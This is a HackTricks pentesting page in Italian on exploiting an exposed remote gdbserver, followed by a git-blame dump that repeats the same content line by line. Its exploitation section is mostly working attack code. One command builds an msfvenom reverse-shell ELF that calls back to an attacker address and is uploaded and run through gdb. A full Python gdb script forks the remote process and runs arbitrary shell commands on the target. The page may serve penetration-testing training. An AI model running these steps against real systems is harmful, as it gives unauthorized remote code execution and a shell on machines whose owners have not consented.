hacktricks/network-services-pentesting/pentesting-remote-gdbserver.md

# Pentesting Remote GdbServer

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>

**Ottieni la prospettiva di un hacker sulle tue app web, rete e cloud**

**Trova e segnala vulnerabilità critiche e sfruttabili con un reale impatto sul business.** Usa i nostri oltre 20 strumenti personalizzati per mappare la superficie di attacco, trovare problemi di sicurezza che ti permettano di elevare i privilegi e utilizzare exploit automatizzati per raccogliere prove essenziali, trasformando il tuo duro lavoro in report persuasivi.

{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

## **Informazioni di base**

**gdbserver** è uno strumento che consente il debug di programmi da remoto. Funziona insieme al programma che necessita di debug sullo stesso sistema, noto come "target." Questa configurazione consente al **GNU Debugger** di connettersi da una macchina diversa, l'"host," dove sono memorizzati il codice sorgente e una copia binaria del programma in fase di debug. La connessione tra **gdbserver** e il debugger può essere effettuata tramite TCP o una linea seriale, consentendo configurazioni di debug versatili.

Puoi far **ascoltare gdbserver su qualsiasi porta** e al momento **nmap non è in grado di riconoscere il servizio**.

## Sfruttamento

### Carica ed Esegui

Puoi facilmente creare un **backdoor elf con msfvenom**, caricarlo ed eseguirlo:
```bash
# Trick shared by @B1n4rySh4d0w
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 PrependFork=true -f elf -o binary.elf

chmod +x binary.elf

gdb binary.elf

# Set remote debuger target
target extended-remote 10.10.10.11:1337

# Upload elf file
remote put binary.elf binary.elf

# Set remote executable file
set remote exec-file /home/user/binary.elf

# Execute reverse shell executable
run

# You should get your reverse-shell
```
### Eseguire comandi arbitrari

C'è un altro modo per **far eseguire al debugger comandi arbitrari tramite un** [**script personalizzato in python preso da qui**](https://stackoverflow.com/questions/26757055/gdbserver-execute-shell-commands-of-the-target).
```bash
# Given remote terminal running `gdbserver :2345 ./remote_executable`, we connect to that server.
target extended-remote 192.168.1.4:2345

# Load our custom gdb command `rcmd`.
source ./remote-cmd.py

# Change to a trusty binary and run it to load it
set remote exec-file /bin/bash
r

# Run until a point where libc has been loaded on the remote process, e.g. start of main().
tb main
r

# Run the remote command, e.g. `ls`.
rcmd ls
```
Prima di tutto **crea localmente questo script**:

{% code title="remote-cmd.py" %}
```python
#!/usr/bin/env python3

import gdb
import re
import traceback
import uuid


class RemoteCmd(gdb.Command):
def __init__(self):
self.addresses = {}

self.tmp_file = f'/tmp/{uuid.uuid4().hex}'
gdb.write(f"Using tmp output file: {self.tmp_file}.\n")

gdb.execute("set detach-on-fork off")
gdb.execute("set follow-fork-mode parent")

gdb.execute("set max-value-size unlimited")
gdb.execute("set pagination off")
gdb.execute("set print elements 0")
gdb.execute("set print repeats 0")

super(RemoteCmd, self).__init__("rcmd", gdb.COMMAND_USER)

def preload(self):
for symbol in [
"close",
"execl",
"fork",
"free",
"lseek",
"malloc",
"open",
"read",
]:
self.load(symbol)

def load(self, symbol):
if symbol not in self.addresses:
address_string = gdb.execute(f"info address {symbol}", to_string=True)
match = re.match(
f'Symbol "{symbol}" is at ([0-9a-fx]+) .*', address_string, re.IGNORECASE
)
if match and len(match.groups()) > 0:
self.addresses[symbol] = match.groups()[0]
else:
raise RuntimeError(f'Could not retrieve address for symbol "{symbol}".')

return self.addresses[symbol]

def output(self):
# From `fcntl-linux.h`
O_RDONLY = 0
gdb.execute(
f'set $fd = (int){self.load("open")}("{self.tmp_file}", {O_RDONLY})'
)

# From `stdio.h`
SEEK_SET = 0
SEEK_END = 2
gdb.execute(f'set $len = (int){self.load("lseek")}($fd, 0, {SEEK_END})')
gdb.execute(f'call (int){self.load("lseek")}($fd, 0, {SEEK_SET})')
if int(gdb.convenience_variable("len")) <= 0:
gdb.write("No output was captured.")
return

gdb.execute(f'set $mem = (void*){self.load("malloc")}($len)')
gdb.execute(f'call (int){self.load("read")}($fd, $mem, $len)')
gdb.execute('printf "%s\\n", (char*) $mem')

gdb.execute(f'call (int){self.load("close")}($fd)')
gdb.execute(f'call (int){self.load("free")}($mem)')

def invoke(self, arg, from_tty):
try:
self.preload()

is_auto_solib_add = gdb.parameter("auto-solib-add")
gdb.execute("set auto-solib-add off")

parent_inferior = gdb.selected_inferior()
gdb.execute(f'set $child_pid = (int){self.load("fork")}()')
child_pid = gdb.convenience_variable("child_pid")
child_inferior = list(
filter(lambda x: x.pid == child_pid, gdb.inferiors())
)[0]
gdb.execute(f"inferior {child_inferior.num}")

try:
gdb.execute(
f'call (int){self.load("execl")}("/bin/sh", "sh", "-c", "exec {arg} >{self.tmp_file} 2>&1", (char*)0)'
)
except gdb.error as e:
if (
"The program being debugged exited while in a function called from GDB"
in str(e)
):
pass
else:
raise e
finally:
gdb.execute(f"inferior {parent_inferior.num}")
gdb.execute(f"remove-inferiors {child_inferior.num}")

self.output()
except Exception as e:
gdb.write("".join(traceback.TracebackException.from_exception(e).format()))
raise e
finally:
gdb.execute(f'set auto-solib-add {"on" if is_auto_solib_add else "off"}')


RemoteCmd()
```
{% endcode %}

<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>

**Ottieni la prospettiva di un hacker sulle tue app web, rete e cloud**

**Trova e segnala vulnerabilità critiche ed esploitabili con un reale impatto sul business.** Usa i nostri oltre 20 strumenti personalizzati per mappare la superficie di attacco, trovare problemi di sicurezza che ti permettano di elevare i privilegi e utilizzare exploit automatizzati per raccogliere prove essenziali, trasformando il tuo duro lavoro in report persuasivi.

{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

{% hint style="success" %}
Impara e pratica AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Impara e pratica GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Supporta HackTricks</summary>

* Controlla i [**piani di abbonamento**](https://github.com/sponsors/carlospolop)!
* **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Condividi trucchi di hacking inviando PR ai** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos su github.

</details>
{% endhint %}
GITBOOK-3884: change request with no subject merged in GitBook 2023-04-30 21:54:03 +00:00			`# Pentesting Remote GdbServer`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:34:23 +00:00			`{% hint style="success" %}`
			`Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:34:23 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:34:23 +00:00			`<summary>Support HackTricks</summary>`
arte 2024-01-03 10:42:55 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:34:23 +00:00			`* Check the [subscription plans](https://github.com/sponsors/carlospolop)!`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Share hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
GITBOOK-3884: change request with no subject merged in GitBook 2023-04-30 21:54:03 +00:00			`</details>`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:34:23 +00:00			`{% endhint %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['network-services-pentesting/512-pentesting-rexec.md', 'netw 2024-08-04 15:18:56 +00:00			`<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['README.md', 'generic-methodologies-and-resources/python/byp 2024-11-09 13:53:04 +00:00			`Ottieni la prospettiva di un hacker sulle tue app web, rete e cloud`
Translated ['README.md', 'binary-exploitation/format-strings/README.md', 2024-11-09 13:26:13 +00:00
			`Trova e segnala vulnerabilità critiche e sfruttabili con un reale impatto sul business. Usa i nostri oltre 20 strumenti personalizzati per mappare la superficie di attacco, trovare problemi di sicurezza che ti permettano di elevare i privilegi e utilizzare exploit automatizzati per raccogliere prove essenziali, trasformando il tuo duro lavoro in report persuasivi.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['README.md', 'network-services-pentesting/512-pentesting-rex 2024-07-29 09:26:42 +00:00			`{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:34:23 +00:00			`## Informazioni di base`
GitBook: [#2855] gdbserver 2021-11-25 01:02:20 +00:00
Translated ['README.md', 'binary-exploitation/format-strings/README.md', 2024-11-09 13:26:13 +00:00			gdbserver è uno strumento che consente il debug di programmi da remoto. Funziona insieme al programma che necessita di debug sullo stesso sistema, noto come "target." Questa configurazione consente al GNU Debugger di connettersi da una macchina diversa, l'"host," dove sono memorizzati il codice sorgente e una copia binaria del programma in fase di debug. La connessione tra gdbserver e il debugger può essere effettuata tramite TCP o una linea seriale, consentendo configurazioni di debug versatili.
GitBook: [#2855] gdbserver 2021-11-25 01:02:20 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:34:23 +00:00			`Puoi far ascoltare gdbserver su qualsiasi porta e al momento nmap non è in grado di riconoscere il servizio.`
GitBook: [#2855] gdbserver 2021-11-25 01:02:20 +00:00
Translated ['README.md', 'binary-exploitation/format-strings/README.md', 2024-11-09 13:26:13 +00:00			`## Sfruttamento`
GitBook: [#2855] gdbserver 2021-11-25 01:02:20 +00:00
Translated ['README.md', 'binary-exploitation/format-strings/README.md', 2024-11-09 13:26:13 +00:00			`### Carica ed Esegui`
GitBook: [#2855] gdbserver 2021-11-25 01:02:20 +00:00
Translated ['README.md', 'binary-exploitation/format-strings/README.md', 2024-11-09 13:26:13 +00:00			`Puoi facilmente creare un backdoor elf con msfvenom, caricarlo ed eseguirlo:`
GitBook: [#2855] gdbserver 2021-11-25 01:02:20 +00:00			```bash
			`# Trick shared by @B1n4rySh4d0w`
			`msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 PrependFork=true -f elf -o binary.elf`

			`chmod +x binary.elf`

			`gdb binary.elf`

			`# Set remote debuger target`
			`target extended-remote 10.10.10.11:1337`

			`# Upload elf file`
			`remote put binary.elf binary.elf`

			`# Set remote executable file`
			`set remote exec-file /home/user/binary.elf`

			`# Execute reverse shell executable`
			`run`

			`# You should get your reverse-shell`
			```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:34:23 +00:00			`### Eseguire comandi arbitrari`
GitBook: [#2855] gdbserver 2021-11-25 01:02:20 +00:00
Translated ['README.md', 'generic-methodologies-and-resources/python/byp 2024-11-09 13:53:04 +00:00			`C'è un altro modo per far eseguire al debugger comandi arbitrari tramite un [script personalizzato in python preso da qui](https://stackoverflow.com/questions/26757055/gdbserver-execute-shell-commands-of-the-target).`
GitBook: [#2855] gdbserver 2021-11-25 01:02:20 +00:00			```bash
			# Given remote terminal running `gdbserver :2345 ./remote_executable`, we connect to that server.
			`target extended-remote 192.168.1.4:2345`

			# Load our custom gdb command `rcmd`.
			`source ./remote-cmd.py`

			`# Change to a trusty binary and run it to load it`
			`set remote exec-file /bin/bash`
			`r`

			`# Run until a point where libc has been loaded on the remote process, e.g. start of main().`
			`tb main`
			`r`

			# Run the remote command, e.g. `ls`.
			`rcmd ls`
			```
Translated to Italian 2024-02-10 13:03:23 +00:00			`Prima di tutto crea localmente questo script:`
GitBook: [#2855] gdbserver 2021-11-25 01:02:20 +00:00
			`{% code title="remote-cmd.py" %}`
			```python
			`#!/usr/bin/env python3`

			`import gdb`
			`import re`
			`import traceback`
			`import uuid`


			`class RemoteCmd(gdb.Command):`
Translated to Italian 2024-02-10 13:03:23 +00:00			`def __init__(self):`
			`self.addresses = {}`

			`self.tmp_file = f'/tmp/{uuid.uuid4().hex}'`
			`gdb.write(f"Using tmp output file: {self.tmp_file}.\n")`

			`gdb.execute("set detach-on-fork off")`
			`gdb.execute("set follow-fork-mode parent")`

			`gdb.execute("set max-value-size unlimited")`
			`gdb.execute("set pagination off")`
			`gdb.execute("set print elements 0")`
			`gdb.execute("set print repeats 0")`

			`super(RemoteCmd, self).__init__("rcmd", gdb.COMMAND_USER)`

			`def preload(self):`
			`for symbol in [`
			`"close",`
			`"execl",`
			`"fork",`
			`"free",`
			`"lseek",`
			`"malloc",`
			`"open",`
			`"read",`
			`]:`
			`self.load(symbol)`

			`def load(self, symbol):`
			`if symbol not in self.addresses:`
			`address_string = gdb.execute(f"info address {symbol}", to_string=True)`
			`match = re.match(`
			`f'Symbol "{symbol}" is at ([0-9a-fx]+) .*', address_string, re.IGNORECASE`
			`)`
			`if match and len(match.groups()) > 0:`
			`self.addresses[symbol] = match.groups()[0]`
			`else:`
			`raise RuntimeError(f'Could not retrieve address for symbol "{symbol}".')`

			`return self.addresses[symbol]`

			`def output(self):`
			# From `fcntl-linux.h`
			`O_RDONLY = 0`
			`gdb.execute(`
			`f'set $fd = (int){self.load("open")}("{self.tmp_file}", {O_RDONLY})'`
			`)`

			# From `stdio.h`
			`SEEK_SET = 0`
			`SEEK_END = 2`
			`gdb.execute(f'set $len = (int){self.load("lseek")}($fd, 0, {SEEK_END})')`
			`gdb.execute(f'call (int){self.load("lseek")}($fd, 0, {SEEK_SET})')`
			`if int(gdb.convenience_variable("len")) <= 0:`
			`gdb.write("No output was captured.")`
			`return`

			`gdb.execute(f'set $mem = (void*){self.load("malloc")}($len)')`
			`gdb.execute(f'call (int){self.load("read")}($fd, $mem, $len)')`
			`gdb.execute('printf "%s\\n", (char*) $mem')`

			`gdb.execute(f'call (int){self.load("close")}($fd)')`
			`gdb.execute(f'call (int){self.load("free")}($mem)')`

			`def invoke(self, arg, from_tty):`
			`try:`
			`self.preload()`

			`is_auto_solib_add = gdb.parameter("auto-solib-add")`
			`gdb.execute("set auto-solib-add off")`

			`parent_inferior = gdb.selected_inferior()`
			`gdb.execute(f'set $child_pid = (int){self.load("fork")}()')`
			`child_pid = gdb.convenience_variable("child_pid")`
			`child_inferior = list(`
			`filter(lambda x: x.pid == child_pid, gdb.inferiors())`
			`)[0]`
			`gdb.execute(f"inferior {child_inferior.num}")`

			`try:`
			`gdb.execute(`
			`f'call (int){self.load("execl")}("/bin/sh", "sh", "-c", "exec {arg} >{self.tmp_file} 2>&1", (char*)0)'`
			`)`
			`except gdb.error as e:`
			`if (`
			`"The program being debugged exited while in a function called from GDB"`
			`in str(e)`
			`):`
			`pass`
			`else:`
			`raise e`
			`finally:`
			`gdb.execute(f"inferior {parent_inferior.num}")`
			`gdb.execute(f"remove-inferiors {child_inferior.num}")`

			`self.output()`
			`except Exception as e:`
			`gdb.write("".join(traceback.TracebackException.from_exception(e).format()))`
			`raise e`
			`finally:`
			`gdb.execute(f'set auto-solib-add {"on" if is_auto_solib_add else "off"}')`
GitBook: [#2855] gdbserver 2021-11-25 01:02:20 +00:00

			`RemoteCmd()`
			```
			`{% endcode %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['network-services-pentesting/512-pentesting-rexec.md', 'netw 2024-08-04 15:18:56 +00:00			`<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['README.md', 'generic-methodologies-and-resources/python/byp 2024-11-09 13:53:04 +00:00			`Ottieni la prospettiva di un hacker sulle tue app web, rete e cloud`
Translated ['README.md', 'binary-exploitation/format-strings/README.md', 2024-11-09 13:26:13 +00:00
Translated ['README.md', 'generic-methodologies-and-resources/python/byp 2024-11-09 13:53:04 +00:00			`Trova e segnala vulnerabilità critiche ed esploitabili con un reale impatto sul business. Usa i nostri oltre 20 strumenti personalizzati per mappare la superficie di attacco, trovare problemi di sicurezza che ti permettano di elevare i privilegi e utilizzare exploit automatizzati per raccogliere prove essenziali, trasformando il tuo duro lavoro in report persuasivi.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['README.md', 'network-services-pentesting/512-pentesting-rex 2024-07-29 09:26:42 +00:00			`{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:34:23 +00:00			`{% hint style="success" %}`
Translated ['README.md', 'binary-exploitation/format-strings/README.md', 2024-11-09 13:26:13 +00:00			`Impara e pratica AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Impara e pratica GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:34:23 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:34:23 +00:00			`<summary>Supporta HackTricks</summary>`
arte 2024-01-03 10:42:55 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:34:23 +00:00			`* Controlla i [piani di abbonamento](https://github.com/sponsors/carlospolop)!`
			`* Unisciti al 💬 [gruppo Discord](https://discord.gg/hRep4RUj7f) o al [gruppo telegram](https://t.me/peass) o seguici su Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
Translated ['README.md', 'binary-exploitation/format-strings/README.md', 2024-11-09 13:26:13 +00:00			`* Condividi trucchi di hacking inviando PR ai [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repos su github.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:34:23 +00:00			`{% endhint %}`